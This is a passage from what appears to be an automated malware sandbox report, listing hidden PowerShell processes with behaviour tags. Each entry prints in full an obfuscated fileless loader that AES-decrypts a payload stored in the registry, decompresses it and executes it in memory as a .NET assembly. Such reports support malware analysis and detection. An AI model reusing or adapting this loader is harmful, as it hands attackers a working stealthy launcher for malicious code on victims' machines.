[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3764
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 